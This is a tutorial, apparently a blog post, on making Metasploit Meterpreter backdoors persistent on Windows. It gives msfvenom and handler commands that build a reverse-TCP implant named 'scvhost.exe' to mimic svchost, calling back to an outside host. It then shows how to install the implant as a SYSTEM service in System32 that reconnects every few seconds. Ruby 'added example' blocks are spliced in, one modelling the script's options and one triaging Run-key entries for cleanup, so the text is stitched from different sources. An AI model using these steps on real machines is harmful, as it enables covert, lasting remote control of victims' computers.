Notes on Meterpreter persistence

When a Meterpreter session is obtained and the session later exits, it does not reconnect on its own; the usual persistence only hands a session back when the remote user logs on again or the remote machine reboots. This post covers custom configuration of the persistence script so that, when the session drops, the client retries the connection to the server (the msf side) at a fixed interval.

0x00 Establishing the connection

On the server side, start msf and listen on a port, waiting for a session.

Start the listener as a background job:

msf> handler -p windows/meterpreter/reverse_tcp -H 0.0.0.0 -P 33333
msf> jobs

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  5   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://0.0.0.0:33333

Generate the backdoor and run it on the client to establish the connection (no AV evasion; that is not covered here):

msf> msfvenom -p windows/meterpreter/reverse_tcp lhost=b1g-d1ck.kionf.com lport=33333 -f exe > scvhost.exe
# lhost: the host running the handler
# lport: the port the handler listens on

Once the client's session arrives, attach to it by session id to get a meterpreter prompt:

msf> sessions -i 6
[*] Starting interaction with 6...
meterpreter >

0x01 Persisting with the persistence script

By default, run persistence pushes the agent to %TEMP% on the target (C:\Users\<user>\AppData\Local\Temp\). If that directory is cleaned up, or if %TEMP% resolves to a per-session numbered subdirectory (as on Remote Desktop hosts, e.g. ...\Temp\2), the autostart entry points at a path that no longer exists and persistence breaks. Choosing the location explicitly with -L avoids this.

Recent Metasploit versions no longer recommend this script (the local module exploit/windows/local/persistence replaces it), and run persistence -h errors out when you ask for the options, so the script file itself is analysed instead.

The script is /usr/share/metasploit-framework/scripts/meterpreter/persistence.rb.

Open it in vim with :set nu to show line numbers; the variable names are self-explanatory, and the defaults can be changed in place.

Code fragment, the default configuration (rhost resolves to the local address that routes to the given host):

key = "HKLM"

# Default parameters for payload
rhost = Rex::Socket.source_address("b1g-d1ck.kionf.com")
rport = 33333
delay = 10
install = false
autoconn = false
serv = false
altexe = nil
target_dir = nil
payload_type = "windows/meterpreter/reverse_tcp"
script = nil
script_on_target = nil


Code fragment, the option help text:

"-h" => [ false, "This help menu"],
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
"-p" => [ true, "The port on which the system running Metasploit is listening"],
"-i" => [ true, "The interval in seconds between each connection attempt"],
"-X" => [ false, "Automatically start the agent when the system boots"],
"-U" => [ false, "Automatically start the agent when the User logs on"],
"-S" => [ false, "Automatically start the agent on boot as a service (with SYSTEM privileges)"],
"-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the agent"],
"-L" => [ true, "Location in target host to write payload to, if none \%TEMP\% will be used."],
"-T" => [ true, "Alternate executable template to use"],
"-P" => [ true, "Payload to use, default is windows/meterpreter/reverse_tcp."]


The options used later in this post are -r, -p, -i, -S and -L.

Option summary:
-h  help
-r  address of the host running the msf listener
-p  port the msf listener is on
-i  retry interval in seconds between connection attempts
-X  autostart at system boot (HKLM Run key)
-U  autostart when the user logs on (HKCU Run key)
-S  autostart at boot as a service (needs SYSTEM)
-A  automatically start a matching multi/handler on the msf side
-L  where the agent is written on the target, %TEMP% by default
-T  alternate executable template
-P  payload to use, windows/meterpreter/reverse_tcp by default

Run the persistence command according to the option help:

meterpreter > run persistence -S -i 5 -p 33333 -r b1g-d1ck.kionf.com -L c:\\Windows\\System32

# Note: with -S the script installs the agent as a Windows service (this, and writing into System32, need elevated privileges).
# With -X or -U instead, the autostart entry is a REG_SZ value under HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
# (or the HKCU equivalent) pointing at the generated .vbs.
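The following is an added example, not code from the original post or from Metasploit: a small offline Ruby model of how persistence.rb turns the flags above into an installation plan, run against the exact command line used in this post. The flag semantics follow the script's option table and defaults quoted above; the method names and the plan hash are this example's own, and the VBS tail mirrors the Do / WScript.Sleep / Loop block that Msf::Util::EXE.to_exe_vbs emits for :persist => true (an assumption about the template, not code copied from it).

```ruby
# Added example: offline model of persistence.rb's flag handling.
# Not the script itself; defaults follow the post's quoted configuration block.
require 'pp'

DEFAULTS = {
  rhost: nil,            # the script resolves this with Rex::Socket.source_address
  rport: 33333, delay: 10, install: false, key: 'HKLM',
  serv: false, autoconn: false, target_dir: nil, altexe: nil,
  payload_type: 'windows/meterpreter/reverse_tcp'
}.freeze

# Flags that consume a value; the rest are booleans (as in the help table).
TAKES_VALUE = %w[-r -p -i -L -T -P].freeze

def parse_persistence_args(argv)
  opts = DEFAULTS.dup
  args = argv.dup
  until args.empty?
    opt = args.shift
    val = TAKES_VALUE.include?(opt) ? args.shift : nil
    case opt
    when '-r' then opts[:rhost] = val
    when '-p' then opts[:rport] = Integer(val)
    when '-i' then opts[:delay] = Integer(val)
    when '-X' then opts[:install] = true; opts[:key] = 'HKLM'  # boot: HKLM Run value
    when '-U' then opts[:install] = true; opts[:key] = 'HKCU'  # logon: HKCU Run value
    when '-S' then opts[:serv] = true                          # service, no Run value
    when '-A' then opts[:autoconn] = true
    when '-L' then opts[:target_dir] = val
    when '-T' then opts[:altexe] = val
    when '-P' then opts[:payload_type] = val
    else raise ArgumentError, "unknown option #{opt}"
    end
  end
  opts
end

RUN_KEY = 'Software\Microsoft\Windows\CurrentVersion\Run'

# Summarise where the agent lands and what relaunches it after a reboot.
def persistence_plan(opts)
  autostart = []
  autostart << "#{opts[:key]}\\#{RUN_KEY} REG_SZ value -> .vbs" if opts[:install]
  autostart << 'Windows service (sc create ... start= auto; needs SYSTEM/admin)' if opts[:serv]
  autostart << 'none: agent dies at reboot' if autostart.empty?
  {
    script_dir: opts[:target_dir] || '%TEMP%',   # -L, otherwise the fragile default
    retry_seconds: opts[:delay],
    autostart: autostart,
    handler: opts[:autoconn] ? "exploit/multi/handler #{opts[:payload_type]} #{opts[:rhost]}:#{opts[:rport]}" : nil
  }
end

# Reconnect loop appended to the generated VBS: the dropped executable is
# relaunched after every exit, so a closed session is retried after `delay` seconds.
def vbs_persist_loop(func_name, delay)
  "Do\r\n#{func_name}\r\nWScript.Sleep #{delay * 1000}\r\nLoop\r\n"
end

if __FILE__ == $PROGRAM_NAME
  argv = ARGV.empty? ? ['-S', '-i', '5', '-p', '33333', '-r', 'b1g-d1ck.kionf.com', '-L', 'c:\Windows\System32'] : ARGV
  opts = parse_persistence_args(argv)
  pp persistence_plan(opts)
  puts vbs_persist_loop('nRgxQyRRrOxm', opts[:delay])   # function name constructed for the example
end
```

Running it with the post's flags shows the point that is easy to miss: -S alone yields a service and no Run value, while -X/-U yield the Run value and no service; the two can be combined. The loop tail is what makes the reconnect interval work regardless of how the agent is autostarted.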

0x02 Testing

Exit the current session to test. Five seconds later the session comes back on its own: the generated VBS runs the dropped executable in a loop and relaunches it after the -i interval each time it exits, so a dropped session is re-established without waiting for a logon or reboot.

Note:

Inspecting and removing the autostart registry entries from meterpreter:

# list the value names under the Run key
meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Enumerating: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Values (3):
SysTeM32
MDxTmrUjRGnvIaT
UxMvAJkbedJu
# read one value
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v UxMvAJkbedJu
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Name: UxMvAJkbedJu
Type: REG_SZ
Data: c:\Windows\System32\ANoZYsNFQVe.vbs
# delete one value
meterpreter > reg deleteval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v MDxTmrUjRGnvIaT
Successfully deleted MDxTmrUjRGnvIaT.
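The following is an added example, not code from the original post: a Ruby triage helper that parses the text meterpreter's reg enumkey and reg queryval commands print, flags Run values that look like this script's output (the script names both the value and the .vbs with 8 to 15 random letters, which matches the names seen above), and emits the meterpreter commands that remove them. The captured output embedded below is constructed for this example; only the value names come from the post, and the Data fields, including the benign SecurityHealth entry, are invented to show what does and does not get flagged.

```ruby
# Added example: triage a Run key dump from meterpreter for persistence.rb agents.
# Sample output below is constructed; only the value names come from the post.
HKLM_RUN = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'

ENUMKEY_OUTPUT = <<~'OUT'
  Enumerating: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  Values (4):
  SecurityHealth
  SysTeM32
  MDxTmrUjRGnvIaT
  UxMvAJkbedJu
OUT

# Build text in the shape `reg queryval` prints (constructed for the example).
def fake_queryval(name, type, data)
  "Key: #{HKLM_RUN}\nName: #{name}\nType: #{type}\nData: #{data}\n"
end

QUERYVAL_OUTPUT = {
  'SecurityHealth'  => fake_queryval('SecurityHealth', 'REG_EXPAND_SZ', '%windir%\system32\SecurityHealthSystray.exe'),
  'SysTeM32'        => fake_queryval('SysTeM32', 'REG_SZ', 'c:\Windows\System32\scvhost.exe'),
  'MDxTmrUjRGnvIaT' => fake_queryval('MDxTmrUjRGnvIaT', 'REG_SZ', 'C:\Users\bob\AppData\Local\Temp\fHtGnWbXoPqL.vbs'),
  'UxMvAJkbedJu'    => fake_queryval('UxMvAJkbedJu', 'REG_SZ', 'c:\Windows\System32\ANoZYsNFQVe.vbs')
}.freeze

RANDOM_ALPHA   = /\A[A-Za-z]{8,15}\z/              # Rex::Text.rand_text_alpha(rand(8)+8)
SCRIPT_PAYLOAD = /\.vbs\b|\b[cw]script(\.exe)?\b/i  # the agent is a .vbs run by the script host

# Value names listed under "Values (n):" in `reg enumkey` output.
def parse_enumkey_values(text)
  in_values = false
  text.each_line.map(&:strip).each_with_object([]) do |line, names|
    if line =~ /\AValues \(\d+\):\z/
      in_values = true
    elsif line =~ /\AKeys \(\d+\):\z/ || line.start_with?('Enumerating:')
      in_values = false
    elsif in_values && !line.empty?
      names << line
    end
  end
end

# Data field of a `reg queryval` dump ('' if absent).
def parse_queryval_data(text)
  text[/^Data:\s*(.*)$/, 1].to_s.strip
end

# Reasons an entry looks like the persistence agent; [] means not flagged.
# A script launch is the trigger; the name heuristics only corroborate it.
def persistence_indicators(name, data)
  reasons = []
  return reasons unless data.match?(SCRIPT_PAYLOAD)
  reasons << 'launches a VBS'
  reasons << 'random 8-15 letter value name' if name.match?(RANDOM_ALPHA)
  script = data.split(/[\\\/]/).last.to_s.sub(/\.\w+\z/, '')
  reasons << 'random 8-15 letter script name' if script.match?(RANDOM_ALPHA)
  reasons << 'dropped in System32 or Temp' if data.match?(/\\(System32|Temp)\\/i)
  reasons
end

def triage_run_key(enumkey_text, queryval_by_name)
  flagged, review = {}, {}
  parse_enumkey_values(enumkey_text).each do |name|
    data = parse_queryval_data(queryval_by_name.fetch(name, ''))
    reasons = persistence_indicators(name, data)
    (reasons.empty? ? review : flagged)[name] = { data: data, reasons: reasons }
  end
  { flagged: flagged, review: review }
end

# Backslashes doubled, as they must be typed on the meterpreter command line.
def msf_escape(path)
  path.gsub('\\') { '\\\\' }
end

# Meterpreter commands removing a flagged value and the script it points to.
def cleanup_commands(name, data)
  ["reg deleteval -k #{msf_escape(HKLM_RUN)} -v #{name}", "rm #{msf_escape(data)}"]
end

if __FILE__ == $PROGRAM_NAME
  result = triage_run_key(ENUMKEY_OUTPUT, QUERYVAL_OUTPUT)
  result[:flagged].each do |name, info|
    puts "[!] #{name} -> #{info[:data]} (#{info[:reasons].join(', ')})"
    cleanup_commands(name, info[:data]).each { |c| puts "    #{c}" }
  end
  result[:review].each { |name, info| puts "[ ] #{name} -> #{info[:data]} (review manually)" }
end
```

The helper deliberately does not flag on the name alone: real Run values such as SecurityHealth are also 8 to 15 letters, so the random-name test is only reported as supporting evidence once a script launch is seen. Entries it does not flag (here SysTeM32, pointing at the dropped scvhost.exe) still need a manual look, and a -S installation leaves a service, not a Run value, so this check does not cover it.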

/usr/share/metasploit-framework/scripts/  holds the scripts invoked with run
/usr/share/metasploit-framework/modules/  holds the framework's modules
When in doubt, read the script source directly.